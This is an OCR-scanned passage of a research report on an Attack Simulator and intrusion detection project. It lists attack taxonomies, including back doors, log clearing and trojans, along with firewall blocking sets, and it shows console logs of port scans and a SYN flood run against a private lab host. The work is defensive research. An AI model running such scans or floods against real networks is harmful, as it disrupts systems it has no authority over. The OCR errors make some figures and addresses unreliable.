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The  use  of  open  computer  networks  as  an  environment  for  exchange  of  information  across  the  globe  in  distributed  applications  requires 
improved  security  measures  on  the  network,  in  particular,  to  information  resources  used  in  applications.  Integrity,  confidentiality  and 
availability  of  the  network  resources  must  be  assured.  To  detect  and  suppress  different  types  of  computer  unauthorized  intrusions,  modern 
network  security  systems  (NSS)  must  be  armed  with  various  protection  means  and  be  able  to  accumulate  experience  in  order  to  increase  its 
ability  to  front  against  known  types  of  Intrusions,  and  to  learn  new  types  of  intrusions.  The  project  will  perform  three  main  tasks. 

1.  Develop  a  mathematical  model  and  a  tool  that  simulates  various  coordinated  intrusion  scenarios  against  computer  networks; 

2.  Develop  the  mathematical  foundations,  architecture,  and  principles  of  implementation  of  autonomous-software-tool  technology 
implementing  the  learning  system  for  intrusion  detection; 

3.  Develop  the  fundamentals,  architecture  and  software  for  the  computer  security  system  based  on  multi-level  encoding  for  information 
protection  in  mass  application. 

Currently,  scientific  efforts  in  network  security  area  are  undertaken  mainly  in  the  development  of  the  network  defense  mechanisms. 
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level..  Thus,  each  such  a  step  of  the  scenario  is  represented  as  a  sequence  of  commands.  Following  the  aforementioned  conceptual 
representation  of  the  intrusion  attempt,  the  research  focuses  on  the  two-level  model  of  attacks.  It  is  supposed  that  available  learning 
information  about  intrusions  of  different  types  comprises  the  experts'  information  and  limited  number  of  cases. 
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Fig.2.6.12.  Example  of  the  screen  displaying  the  attack  scenario  generation  processes  of  the  intention  GAR 

(an  intermediate  stage  of  attack  scenario) 


The  graphical  representation  of  attack  outcome  parameters  (NS,  PIR,  PAR,  PFB,  PRA)  values  at 
intention  GAR  realization  for  various  values  of  input  parameters  is  displayed  in  Fig.2.6.14. 
Designations  of  experiments  groups  1  -  16  in  this  integral  diagram  correspond  to  the  following 
combinations  of  input  parameters: 

1  -  (1,1, 1,1); 

2 -(1,1, 1,2); 

3 - (1,1, 2,1); 

4 - (1,1, 2, 2); 

5 - (1,2, 1,1); 

6 - (1,2, 1,2); 

7 - (1,2, 2,1); 

8 - (1,2, 2, 2); 

9 - (2, 1,1,1); 

10 - (2, 1,1, 2); 

11 -(2, 1,2,1); 

12 -(2, 1,2, 2); 

13 - (2, 2, 1,1); 

14 - (2, 2, 1,2); 

15 - (2, 2, 2,1); 

16 - (2, 2, 2, 2). 
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Fig.2.6.13.  Example  of  the  screen  displaying  the  attack  scenario  generation  processes  of  the  intention  GAR 

(a  final  stage  of  attack  scenario) 

The  chain  of  symbols  in  parenthesis  (N1,N2,N3,N4)  designates  the  input  parameters  combination, 
where  N1  -  protection  degree  of  network  firewall,  N2  -  protection  degree  of  attacked  host  (personal) 
firewall,  N3  -  protection  parameters  of  attacked  hast,  N  4-  degree  of  hacker’s  knowledge  about  a 
network. 

For  example,  the  combination  (1,1, 1,1)  corresponds  “Strong”  (1)  protection  degree  of  network 
firewall,  “Strong”  (1)  protection  degree  of  attacked  host  (personal)  firewall,  “Strong”  (1)  protection 
parameters  of  attacked  host,  and  “Good”  (1)  degree  of  hacker’s  knowledge  about  a  network. 

Changes  of  parameters  PIR,  PAR,  PFB,  PRA  for  various  network  and  personal  firewalls 
configurations  are  represented  in  Fig.2.6.15  -  Fig.2.6.18  as  graphic  dependences. 

For  constmction  of  these  dependences  the  following  values  were  used  as  x-coordinate  parameters: 
1  -  both  network  and  personal  firewalls  are  active;  2  -  only  network  firewall  is  active;  3  -  only 
personal  firewall  is  active;  4  -  none  of  firewalls  is  active. 

The  main  parameters  changes  under  maximal  protection  of  attacked  host  (“Strong”  (1))  and 
maximal  hacker’s  knowledge  about  a  network  (“Good”  (1))  are  depicted  in  Fig.2.6.15. 

The  main  parameters  changes  under  maximal  protection  of  attacked  host  (“Strong”  (1))  and 
minimal  hacker’s  knowledge  about  a  network  (“Nothing”  (2))  are  depicted  in  Fig.2.6.16. 

The  main  parameters  changes  under  minimal  protection  of  attacked  host  (“None”  (2))  and 
maximal  hacker’s  knowledge  about  a  network  (“Good”  (1))  are  depicted  in  Fig.2.6.17. 

The  main  parameters  changes  minimal  protection  of  attacked  host  (“None”  (2))  and  minimal 
hacker’s  knowledge  about  a  network  (“Nothing”  (2))  are  depicted  in  Fig.2.6.18. 
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Fig.2.6.14.  Integral  diagram  of  attack  outcome  parameters  values  for  intention  GAR 
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Fig.2.6.15.  Changes  of  parameters  PIR,  PAR,  PFB,  PRA  values  for  various  network  and  personal  firewalls 
configurations  under  realization  of  intention  GAR  (protection  degree  of  attacked  host  is  “Strong”  (1) 
and  degree  of  hacker’s  knowledge  about  a  network  is  “Good”  (1)) 
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Fig.2.6.16.  Changes  of  parameters  PIR,  PAR,  PFB,  PRA  values  for  various  network  and  personal  firewalls 
configurations  under  realization  of  intention  GAR  (protection  degree  of  attacked  host  is  “Strong”  (1) 
and  degree  of  hacker’s  knowledge  about  a  network  is  “Nothing”  (2)) 


Fig.2.6.17.  Changes  of  parameters  PIR,  PAR,  PFB,  PRA  values  for  various  network  and  personal  firewalls 
configurations  under  realization  of  intention  GAR  (protection  degree  of  attacked  host  is  “None”  (2) 
and  degree  of  hacker’s  knowledge  about  a  network  is  “Good”  (1)) 
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Fig.2.6.18.  Changes  of  parameters  PIR,  PAR,  PFB,  PRA  values  for  various  network  and  personal  firewalls 
configurations  under  realization  of  intention  GAR  (protection  degree  of  attacked  host  is  “None”  (2) 
and  degree  of  hacker’s  knowledge  about  a  network  is  “Nothing”  (2)) 


- PP=Strong,  KN=Good  - PP=Strong,  KN=Nothing  - PP=Weak,  KN=Good  -PP=Weak,  KN=Nothing 

Fig.2.6.19.  Changes  of  parameter  NS  values  for  various  network  and  personal  firewalls  configurations 

under  realization  of  intention  GAR 

Changes  of  parameter  NS  values  for  different  configurations  of  firewalls,  degrees  of  protection 
parameters  of  attacked  host  and  degrees  of  hacker’s  knowledge  about  a  network  are  depicted  in 
Fig.2.6.19  as  graphical  dependences. 

The  following  designations  are  used  in  the  figure:  PP-  protection  parameters  of  attacked  host;  KN 
-  degree  of  hacker’s  knowledge  about  a  network. 
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2.2.  Description  of  experiments  for  intention  Confidentiality  Violation  Realization  (CVR) 

Let  us  consider  the  input  parameters  which  influence  on  efficacy  of  attacks  was  investigated  at 
carrying  out  experiments  on  intention  CVR  realization. 

Let  us  present  in  the  beginning  the  firewall  parameters  used  at  intention  CVR  realization. 

At  realization  of  intention  CVR,  besides  intention  CVR,  some  other  intentions  are  used.  The  first 
part  of  these  additional  intentions  (IH,  IS,  10,  Cl,  RE,  UE,  ABE)  is  for  getting  information  about  an 
attacked  network  to  fulfill  the  attacks  of  class  CVR.  The  second  part  of  additional  intentions  (GAR 
and  EP)  is  served  for  getting  access  to  a  host  and  increasing  privileges.  The  third  part  (GAD,  CT, 
CBD)  is  intended  for  gaining  additional  data,  covering  tracks  and  creating  back  doors  for  subsequent 
access  to  resources  of  the  host  attacked. 

Let  us  consider  the  terminal  attacks  which  are  generated  at  realization  of  all  these  intentions  (for 
intentions  IH,  IS,  10,  Cl,  RE,  UE,  ABE  and  GAR,  described  above  at  the  description  of  intention  GAR 
realization,  we  list  only  abbreviations  of  these  attacks). 

Terminal  attacks  of  intention  IH  (Identification  of  the  running  Hosts):  STIH,  SSIH,  DC. 

Terminal  attacks  of  intention  IS  (Identification  of  the  host  Services):  ST,  SS,  SFI,  SX,  SN,  SU, 
HS,  SFB,  DHS,  PS. 

Terminal  attacks  of  intention  10  (Identification  of  the  host  Operating  system):  TZ,  TS,  FF,  RF, 
RS,  II,  IL,  MD,  IW,  MA,  IV,  IF,  IP,  ISP,  IDOS. 

Terminal  attacks  of  intention  Cl  (Collecting  of  additional  Information):  1ST,  AM,  NS. 

Terminal  attacks  of  intention  RE  (Resource  Enumeration):  EDNV,  EDC,  CNS,  ERD,  SRE,  NV, 
RMT,  SRVC,  SRVI,  DUMP,  LEG,  NAT,  NETD,  NETV. 

Terminal  attacks  of  intention  UE  (Users  and  groups  Enumeration):  DNNT,  SNMPE,  CNS,  FUE, 
UTFTP,  EUE,  PIUD,  ISU,  IAS. 

Terminal  attacks  of  intention  ABE  (Applications  and  Banners  Enumeration):  TCBG,  UNU,  FP, 
UREG,  UDUM. 

Terminal  attacks  of  intention  GAR  (Gaining  Access  to  Resources): 

CPF,  AAF,  BFPG,  RAH,  FCA,  PG,  AR,  UDG,  RAM,  RA,  DIMC,  EFE,  BO,  MMC,  UPWS,  TH, 
MP,  ABTH,  ATH,  SF,  LA,  PF,  SA,  PD,  UF,  IFS,  APF,  WDPF,  MUID,  MRF,  CC. 

Terminal  attacks  of  intention  EP  (Escalating  Privilege): 

PC,  UKE, 

where  PC  —  “Password  Cracking”,  UKE  —  “Use  of  Known  Exploits”. 

Terminal  attacks  of  intention  GAD  (Gaining  Additional  Data): 

ETR,  SCP, 

where  ETR  -  ‘  ‘Evaluating  Trust  Relations'  ”,  SCP  -  ‘  ‘Search  for  Cleartext  password”. 

Terminal  attacks  of  intention  CVR  (Confidentiality  Violation  Realization): 

FRR,  RBV, 

where  FRR  -  ‘  ‘File(s)  Reading  Realization  ”,  RBV  -  ‘  ‘Reading  By  Virus”. 

Terminal  attacks  of  intention  CT  (Covering  Tracks): 

CL,  HT, 

where  CL  —  “Clearing  Logs”,  HT— “Hiding  Tools”. 

Terminal  attacks  of  intention  CBD  (Creating  Back  Doors): 

CRUA,  SBJ,  ISF,  PRCS,  IMM,  RAT, 

where  CRUA— “Creating  Rogue  User  Accounts”,  SBJ  —  “Scheduling  Batch  Jobs”,  ISF  — 
“infecting  Startup  Files”,  PRCS  —  “Planting  Remote  Control  Services  ”,  IMM  - 
“installing  Monitoring  Mechanisms”,  RAT  —  “Replacing  Apps  with  Trojans”. 

The  full  set  of  attacks  generated  at  realization  of  intention  CVR  (104  attacks)  is  as  follows: 

STIH,  SSIH,  DC,  ST,  SS,  SFI,  SX,  SN,  SU,  HS,  SFB,  DHS,  PS,  TZ,  TS,  FF,  RF,  RS,  II,  IL,  MD, 
IW,  MA,  IV,  IF,  IP,  ISP,  IDOS,  1ST,  AM,  NS,  EDNV,  EDC,  CNS,  ERD,  SRE,  NV,  RMT,  SRVC, 
SRVI,  DUMP,  LEG,  NAT,  NETD,  NETV,  DNNT,  SNMPE,  CNS,  FUE,  UTFTP,  EUE,  PIUD,  ISU, 
IAS,  TCBG,  UNU,  FP,  UREG,  UDUM,  CPF,  AAF,  BFPG,  RAH,  FCA,  PG,  AR,  UDG,  RAM,  RA, 
DIMC,  EFE,  BO,  MMC,  UPWS,  TH,  MP,  ABTH,  ATH,  SF,  LA,  PF,  SA,  PD,  UF,  IFS,  APF,  WDPF, 
MUID,  MRF,  CC,  PC,  UKE,  ETR,  SCP,  FRR,  RBV,  CL,  HT,  CRUA,  SBJ,  ISF,  PRCS,  IMM,  RAT. 
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In  comparison  with  GAR  the  following  attacks  are  added  to  this  set:  PC,  UKE,  ETR,  SCP,  FRR, 
RBV,  CL,  HT,  CRUA,  SBJ,  ISF,  PRCS,  IMM,  RAT. 

The  list  of  attacks  removed  from  the  full  set  of  attacks  (3 1  attacks  (30  %)),  intended  for  formation 
of  the  list  of  the  attacks  forbidden  by  network  firewall,  is  as  follows: 

SX,  TS,  FF,  IDOS,  1ST,  DNNT,  SNMPE,  AR,  UDG,  UREG,  UDUM,  FUE,  UTFTP,  EUE,  PIUD, 
ISU,  IAS,  RAM,  RA,  DIMC,  MMC,  UPWS,  LA,  PF,  SA,  MRF,  CC,  UKE,  FRR,  CRUA,  RAT. 

In  comparison  with  GAR  the  following  attacks  are  added  to  this  set:  UKE,  FRR,  CRUA,  RAT. 

The  list  of  attacks  removed  from  the  full  set  of  attacks  (42  attacks  (40  %)),  intended  for  formation 
of  the  list  of  the  attacks  forbidden  by  personal  firewall,  is  as  follows: 

SSIH,  DC,  ST,  RS,  II,  IL,  MD,  IW,  MA,  CNS,  ERD,  SRE,  NV,  RMT,  NETV,  CNS,  TCBG, 
UNU,  FP,  MP,  ABTH,  ATH,  SF,  PD,  TH,  UF,  IFS,  APF,  SRVI,  DUMP,  LEG,  NAT,  NETD,  CPF, 
AAF,  WDPF.  PC,  ETR,  CL,  HT,  ISF,  PRCS. 

In  comparison  with  GAR  the  following  attacks  are  added  to  this  set:  PC,  ETR,  CL,  HT,  ISF, 
PRCS. 

Starting  from  specified  argumentations,  at  carrying  out  the  attacks  realizing  intention  CVR,  it  was 
supposed,  that  depending  on  protection  degree  a  network  firewall  can  block  the  following  terminal 
level  attacks: 

1)  For  “Strong”  protection  degree  from  full  set  of  the  attacks  generated  at  intention  CVR 
realization,  the  following  73  attacks  (70  %)  are  chosen: 

STIH,  SSIH,  DC,  ST,  SS,  SFI,  SN,  SU,  HS,  SFB,  DHS,  PS,  TZ,  RF,  RS,  II,  IL,  MD,  IW,  MA,  IV, 
IF,  IP,  ISP,  AM,  NS,  EDNV,  EDC,  CNS,  ERD,  SRE,  NV,  RMT,  SRVC,  SRVI,  DUMP,  LEG,  NAT, 
NETD,  NETV,  CNS,  TCBG,  UNU,  FP,  CPF,  AAF,  BFPG,  RAH,  FCA,  PG,  EFE,  BO,  TH,  MP, 
ABTH,  ATH,  SF,  PD,  UF,  IFS,  APF,  WDPF,  MUID,  PC,  ETR,  SCP,  RBV,  CL,  HT,  SBJ,  ISF,  PRCS, 
IMM. 

In  comparison  with  GAR  the  following  attacks  are  added  to  this  set:  PC,  ETR,  SCP,  RBV,  CL, 
HT,  SBJ,  ISF,  PRCS,  IMM. 

2)  For  “None”:  -  . 

The  protection  degrees  of  personal  firewall  are  as  follows: 

1)  For  “Strong”  protection  degree  from  full  set  of  the  attacks  generated  at  intention  CVR 
realization,  the  following  62  attacks  (60  %)  are  chosen: 

STIH,  SS,  SFI,  SN,  SU,  HS,  SFB,  DHS,  PS,  TZ,  RF,  IV,  IF,  IP,  ISP,  AM,  NS,  EDNV,  EDC, 
SRVC,  BFPG,  RAH,  FCA,  PG,  EFE,  BO,  MUID,  SX,  TS,  FF,  IDOS,  1ST,  DNNT,  SNMPE,  AR, 
UDG,  UREG,  UDUM,  FUE,  UTFTP,  EUE,  PIUD,  ISU,  IAS,  RAM,  RA,  DIMC,  MMC,  UPWS,  LA, 
PF,  SA,  MRF,  CC,  UKE,  SCP,  FRR,  RBV,  CRUA,  SBJ,  IMM,  RAT. 

In  comparison  with  GAR  the  following  attacks  are  added  to  this  set:  UKE,  SCP,  FRR,  RBV, 
CRUA,  SBJ,  IMM,  RAT. 

2)  For  “None”:  -  . 

Protection  parameters  of  attacked  host  and  parameters  defining  a  hacker’s  knowledge  about  a 


network,  are  similar  to  the  parameters  used  at  realization  of  intention  GAR. 

Examples  of  the  screens,  displaying  various  stages  of  attack  scenario  generation  for  intention 
CVR,  are  submitted  in  Fig.2.6.20  -  Fig.2.6.23.  The  values  of  input  parameters  used  for  the  attack 
scenario  are  as  follows: 

(1)  protection  degree  of  network  firewall  is  “None”  (2); 

(2)  protection  degree  of  personal  firewall  is  “Strong”  (1); 

(3)  protection  degree  of  host  parameters  is  “Strong”  (1); 

(4)  degree  of  a  hacker’s  knowledge  about  a  network  is  “Good”  (1). 

The  graphical  representation  of  attack  outcome  parameters  (NS,  PIR,  PAR,  PFB,  PRA)  values  at 
intention  CVR  realization  for  various  values  of  input  parameters  is  displayed  in  Fig.2.6.24. 
Designations  of  experiments  groups  1  -  16  in  this  integral  diagram  correspond  to  the  same 
combinations  of  input  parameters  as  for  intention  GAR:  1  -  (1,1, 1,1);  2  -  (1,1, 1,2);  3  -  (1,1, 2,1);  4  - 


(1,1, 2, 2);  5  -  (1,2, 1,1);  6  -  (1,2, 1,2);  7  -  (1,2, 2,1);  8  -  (1,2, 2, 2);  9  -  (2, 1,1,1);  10  -  (2, 1,1, 2);  11  - 
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Fig.2.6.20.  Example  of  the  screen  displaying  the  attack  scenario  generation  processes  of  the  intention  CVR 

(an  initial  stage  of  attack  scenario) 

Changes  of  parameters  PIR,  PAR,  PFB,  PRA  for  intention  CVR  realization  under  various  network 
and  personal  firewalls  configurations  are  represented  in  Fig.2.6.25  -  Fig.2.6.28  as  graphic 
dependences. 

For  construction  of  these  dependences  as  parameters  of  ^coordinate  the  same  values  as  for 
intention  GAR  were  used:  1  -  both  network  and  personal  firewalls  are  active;  2  -  only  network 
firewall  is  active;  3  -  only  personal  firewall  is  active;  4  -  none  of  firewalls  is  active. 

The  main  parameters  changes  under  maximal  protection  of  attacked  host  (‘Strong”  (1))  and 
maximal  hacker’s  knowledge  about  a  network  (“Good”  (1))  are  depicted  in  Fig.2.6.25. 

The  main  parameters  changes  under  maximal  protection  of  attacked  host  (“Strong”  (1))  and 
minimal  hacker’s  knowledge  about  a  network  (“Nothing”  (2))  are  depicted  in  Fig.2.6.26. 

The  main  parameters  changes  under  minimal  protection  of  attacked  host  (“None”  (2))  and 
maximal  hacker’s  knowledge  about  a  network  (“Good”  (1))  are  depicted  in  Fig.2.6.27. 

The  main  parameters  changes  minimal  protection  of  attacked  host  (“None”  (2))  and  minimal 
hacker’s  knowledge  about  a  network  (“Nothing”  (2))  are  depicted  in  Fig.2.6.28. 

Changes  of  parameter  NS  values  for  different  configurations  of  firewalls,  degrees  of  protection 
parameters  of  attacked  host  and  degrees  of  hacker’s  knowledge  about  a  network  are  depicted  in 
Fig.2.6.29  as  graphical  dependences. 
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Fig.2.6.21.  Example  of  the  screen  displaying  the  attack  scenario  generation  processes  of  the  intention  CVR 

(a  second  stage  of  attack  scenario) 


Fig.2.6.22.  Example  of  the  screen  displaying  the  attack  scenario  generation  processes  of  the  intention  CVR 

(a  third  stage  of  attack  scenario) 
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Fig. 2.6. 23.  Example  of  the  screen  displaying  the  attack  scenario  generation  processes  of  the  intention  CVR 

(a  final  stage  of  attack  scenario) 

The  total  logs  of  attack  traces  produced  in  experiments  fulfilled  on  macro-level  are  fixed  in 
Appendix  A4. 1 . 

The  total  log  of  the  Attack  Simulator  run  for  the  intention  ABE  (“Applications  and  Banners 
Enumeration”)  realization  is  presented  in  paragraph  A4.1.1.  The  log  was  generated  under  the 
following  conditions: 

•  protection  degree  of  network  firewall  is  “Strong”  (1); 

•  an  attacked  host  firewall  is  absent  (3). 

The  total  log  of  the  Attack  Simulator  mn  for  the  intention  GAR  (“Gaining  Access  to  Resources”) 
realization  is  presented  in  paragraph  A4.1.2.  The  log  was  generated  under  the  following  conditions: 

•  protection  degree  of  network  firewall  is  “None”  (2); 

•  protection  degree  of  attacked  host  firewall  is  “None”  (2); 

•  protection  parameters  of  attacked  host  are  “Weak”  (2); 

•  degree  of  hacker’s  knowledge  about  a  network  is  “Nothing”  (2). 

The  total  log  of  the  Attack  Simulator  mn  for  the  intention  CVR  (“Confidentiality  Violation 
Realization”)  realization  is  presented  in  paragraph  A4.1.3.  The  log  was  generated  under  the  following 
conditions: 

•  protection  degree  of  network  firewall  is  “None”  (2); 

•  protection  degree  of  attacked  host  firewall  is  “Strong”  (1); 

•  protection  parameters  of  attacked  host  are  “Strong”  (1); 

•  degree  of  hacker’s  knowledge  about  a  network  is  “Good”  (1). 

The  attributes  of  the  logs  correspond  to  the  attributes  of  the  ontology  notions  Log  and  LogResult. 
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Fig.2.6.24.  Integral  diagram  of  attack  outcome  parameters  values  for  intention  CVR 


Fig.2.6.25.  Changes  of  parameters  PIR,  PAR,  PFB,  PRA  values  for  various  network  and  personal  firewalls 
configurations  under  realization  of  intention  CVR  (protection  degree  of  attacked  host  is  “Strong”  (1) 
and  degree  of  hacker’s  knowledge  about  a  network  is  “Good”  (1)) 
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Percentage  of  realization  Percentage  of  realization 


Fig.2.6.26.  Changes  of  parameters  PIR,  PAR,  PFB,  PRA  values  for  various  network  and  personal  firewalls 
configurations  under  realization  of  intention  CVR  (protection  degree  of  attacked  host  is  “Strong”  (1) 
and  degree  of  hacker’s  knowledge  about  a  network  is  “Nothing”  (2)) 


12  3  4 

PIR  - PAR  - PFB  - PRA 


Fig.2.6.27.  Changes  of  parameters  PIR,  PAR,  PFB,  PRA  values  for  various  network  and  personal  firewalls 
configurations  under  realization  of  intention  CVR  (protection  degree  of  attacked  host  is  “None”  (2) 
and  degree  of  hacker’s  knowledge  about  a  network  is  “Good”  (1)) 
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Fig.2.6.28.  Changes  of  parameters  PIR,  PAR,  PFB,  PRA  values  for  various  network  and  personal  firewalls 
configurations  under  realization  of  intention  CVR  (protection  degree  of  attacked  host  is  “None”  (2) 
and  degree  of  hacker’s  knowledge  about  a  network  is  “Nothing”  (2)) 


- PP=Strong,  KN=Good  — PP=Strong,  KN=Nothing  — PP=Weak,  KN=Good  — PP=Weak,  KN=Nothing 

Fig.2.6.29.  Changes  of  parameter  NS  values  for  various  network  and  personal  firewalls  configurations 

under  realization  of  intention  CVR 
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2.6.2.  Simulation  of  attacks  on  micro -level  (generation  malicious  network  traffic  against  real 
computer  network) 

For  checking  efficacy  of  the  Attack  Simulator  prototype  at  a  micro-level  the  network  packets  for 
th  e  following  classes  of  attacks  were  generated: 

1)  Port  scanning,  including  subclasses  “Port  Scanning”  (SPIH)  and  “Port  Scanning  during 
Identification  of  Services  ”  (SPIS). 

2)  Denial  of  service,  on  the  basis  of  realization  of  “SYN  flood”  (SF); 

3)  Password  Guessing,  on  the  basis  of  realization  of  attacks  “Password  Guessing”  (PG)  and 
“Password  Cracking”  (PC). 

The  network  model  used  in  the  Attack  Simulator  corresponded  to  a  real  computer  network  against 
which  attacks  at  a  micro- level  were  carried  out. 

All  attacks  described  in  this  paragraph  have  been  directed  on  the  host  having  IP-address 
192.168.130.135. 

For  a  class  of  attacks  “Port  Scanning”  (SPIH),  experiments  on  realization  of  the  attacks  ‘TCP 
connect  scan"  (STIH)  and  "TCP  SYN  scan"  (SSIH)  were  fulfilled. 

For  a  class  of  attacks  “Port  Scanning  during  Identification  of  Services”  (SPIS),  experiments  on 
realization  of  the  attacks  "TCP  connect  scan"  (ST),  "TCP  SYN  scan"  (SS),  "TCP 
FIN  scan"  (SFI),  "TCP  Xmas  Tree  scan"  (SX)  ,  "TCP  Null  scan"  (SN)  , 
"UDP  scan"  (SU)  ,  "Half  scan"  (HS)  were  carried  out. 

Examples  of  the  screens  displaying  the  process  of  various  scanning  attacks  generation  are  depicted 
in  Fig.2.6.30  and  Fig.2.6.31. 

An  example  of  the  window  showing  realization  of  the  intention  “Port  Scanning  during 
Identification  of  Services”  (SPIS)  scenario  at  a  macro- level  and  a  call  of  various  scanning  attacks  is 
represented  in  Fig.2.6.30. 


Fig.2.6.30.  Example  of  the  window  showing  realization  of  the  intention  “Port  Scanning  during  Identification  of 

Services”  (SPIS)  scenario  at  a  macro -level 
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B1  Shortcut  to  PORTAL.BAT 


Starting  scanports  v.1.0.  TCP  scanning  by  using 
AttackID:  SS 

Selected  deuice:  Realtek  8139-series  PCI  NIC 

1.  192. 168. 130. 136. 1050- >192. 168. 130. 135. 21  TCP 

2.  192. 168. 130. 135. 21->192. 168. 130. 136. 1050  TCP 
Port  21  is  seems  to  be  OPEN. 

3.  192.168.130.136.105O->192.168.130.135.21  TCP 

1.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 79  TCP 

2.  192. 168. 130. 135. 79->192. 168. 130. 136. 1050  TCP 
Port  79  is  seems  to  be  CLOSED. 

3.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 79  TCP 

1.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 80  TCP 

2.  192. 168. 130. 135. 80- >192. 168. 130. 136. 1050  TCP 
Port  80  is  seems  to  be  OPEN. 

3.  192. 168. 130. 136. 1050- >192. 168. 130. 135. 80  TCP 

1.  192. 168. 130. 136. 1050- >192. 168. 130. 135. 81  TCP 

2.  192. 168. 130. 135. 81->192. 168. 130. 136. 1050  TCP 
Port  81  is  seems  to  be  CLOSED. 

3.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 81  TCP 

Starting  scanports  v.1.0.  TCP  scanning  by  using 
AttackID:  HS 


Selected  deuice:  Realtek  8139— series  PCI  NIC 

1.  192. 168. 130. 136. 1050->1 92. 168. 130-135. 21  TCP 

2.  192. 168. 130. 135. 21->192. 168. 130. 136. 1050  TCP 
Port  21  is  seems  to  be  OPEN. 

3.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 21  TCP 

1.  192. 168. 130. 136. 105O->1 92. 168. 130. 135. 79  TCP 

2.  192. 168. 130. 135. 79->192. 168. 130. 136. 1050  TCP 
Port  79  is  seems  to  be  CLOSED. 

3.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 79  TCP 

1.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 80  TCP 

2.  192. 168. 130. 135. 80- >192. 168. 130. 136. 1050  TCP 
Port  80  is  seems  to  be  OPEN. 

3.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 80  TCP 

1.  192.168.130.136 .1050->192 .168.130.135.81  TCP 

2.  192. 168. 130. 135. 81->192. 168. 130. 136. 1050  TCP 
Port  81  is  seems  to  be  CLOSED. 

3.  192. 168. 130. 136. 1050- >192. 168. 130. 135. 81  TCP 

Starting  scanports  v.1.0.  TCP  scanning  by  using 
AttackID:  SX 


Selected  device:  Realtek  8139-series  PCI  NIC 

1.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 21  TCP 

2.  192. 168. 130. 135. 21->192. 168. 130. 136. 1050  TCP 
Port  21  is  seems  to  be  OPEN. 

3.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 21  TCP 

1.  192.168.130.136 .1050->192 .168.130.135.79  TCP 

2.  192. 168. 130. 135. 79->192. 168. 130. 136. 1050  TCP 
Port  79  is  seems  to  be  CLOSED. 

3.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 79  TCP 

1.  192. 168. 130. 136. 1050- >192. 168. 130. 135. 80  TCP 

2.  192. 168. 130. 135. 80- >192. 168. 130. 136. 1050  TCP 
Port  80  is  seems  to  be  OPEN. 

3.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 80  TCP 
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messages  - 


3] 


<seq:  12f798  ack:  0> 

ACK  (seq:  8b6feee8  ack:  12f799> 

ACK  (seq:  12f799  ack:  8b6feee9> 

(seq:  12f798  ack:  0> 

ACK  (seq:  0  ack:  12f799> 

ACK  (seq:  12f799  ack:  1> 

<seq :  12f798  ack:  0> 

ACK  (seq:  8b788c3f  ack:  12f799> 

ACK  <seq:  12f799  ack:  8b788c40> 

(seq:  12f798  ack:  0> 

ACK  (seq:  0  ack:  12f799> 

ACK  <seq:  12f799  ack:  1> 

messages . 


<seq:  12f798  ack:  0> 

ACK  (seq:  8b892e46  ack:  12f799> 

ACK  <seq:  12f799  ack:  8b892e47> 

(seq:  12f798  ack:  0> 

ACK  (seq:  0  ack:  12f799> 

ACK  <seq:  12f799  ack:  1> 

(seq:  12f798  ack:  0> 

ACK  (seq:  8b919779  ack:  12f799> 

ACK  (seq:  12f799  ack:  8b91977a> 

(seq:  12f798  ack:  0> 

ACK  (seq:  0  ack:  12f799> 

ACK  (seq:  12f799  ack:  1> 

messages . 


(seq:  12f798  ack:  0> 

ACK  (seq:  8ba2e74d  ack:  12f799> 

ACK  (seq:  12f799  ack:  8ba2e74e> 

(seq:  12f798  ack:  0> 

ACK  (seq:  0  ack:  12f799> 

ACK  (seq:  12f799  ack:  1> 

(seq:  12f798  ack:  0> 

ACK  (seq:  8bab55f7  ack:  12f799> 

ACK  (seq:  12f799  ack:  8bab55f8> 


Fig.2.6.31.  Example  of  the  window  showing  the  scanning  attacks  realization  at  a  micro-level 
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Fig.2.6.32.  Example  of  the  window  showing  realization  of  the  attack  scenario  “Denial  of  service”  (DS)  at  a 
macro -level  and  a  call  of  “SYN  flood”  (SF)  attack  action 


An  example  of  the  window  showing  realization  of  scanning  attacks  at  a  micro-level  is  submitted  in 
Fig.2.6.31.  These  attacks  were  called  from  the  intention  “Port  Scanning  during  Identification  of 
Services”  (SPIS)  scenario,  which  fragment  is  represented  in  Fig.2.6.30. 

Fragments  of  attacks  "TCP  SYN  scan"  (SS),  "Half  scan"  (HS)  and  "TCP  Xmas 
Tree  scan"  (SX)  are  considered  in  Fig.2.6.31. 

Examples  of  the  screens  displaying  the  generation  of  attack  “SYN  flood”  (SF)  of  the  class  “Denial 
of  service”  are  depicted  in  Fig.2.6.32  and  Fig.2.6.33. 

A  fragment  of  the  attack  “Denial  of  service”  (DS)  scenario  at  a  macro-level  and  a  call  of  attack 
“SYN  flood”  (SF)  is  shown  in  Fig.2.6.32. 

An  example  of  the  window  showing  the  attack  ‘SYN  flood”  (SF)  realization  at  a  micro- level  is 
represented  in  Fig.2.6.33. 
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QS  Shortcut  to  PORTAL.BAT 

X 

3.  192. 168. 130. 136. 1050->1 92. 168. 130. 135. 81  TCP  RST  ACK  <seq:  12f799  ack:  1> 

SVN  flooding  u.1.0 

Starting. . . 

192.168.128.15.1025->192.168.130.135.21  TCP  SVN  <seq 

Ia9a5  ack:  0> 

192. 168. 128. 15. 1026->1 92. 168. 130. 135. 21  TCP  SVN  <seq 

26372  ack:  0>  _J 

192. 168. 128. 15. 1027- >192. 168. 130. 135. 21  TCP  SVN  <seq 

16d9b  ack:  0> 

192. 168. 128. 15. 102 8->192. 168. 130. 135. 21  TCP  SVN  <seq 

24379  ack:  0> 

192. 168. 128. 15. 102 9->192. 168. 130. 135. 21  TCP  SVN  <seq 

25413  ack:  0> 

192. 168. 128. 15. 1 03 0->l 92. 168. 130. 135. 21  TCP  SVN  <seq 

15e0a  ack:  0> 

192. 168. 128. 15. 1 03 1->1 92. 168. 130. 135. 21  TCP  SVN  <seq 

If 590  ack:  0> 

192.168.128.15.1032->192.168.130.135.21  TCP  SVN  <seq 

214h2  ack:  0> 

192. 168. 128. 15. 103 3->192. 168. 130. 135. 21  TCP  SVN  <seq 

23451  ack:  0> 

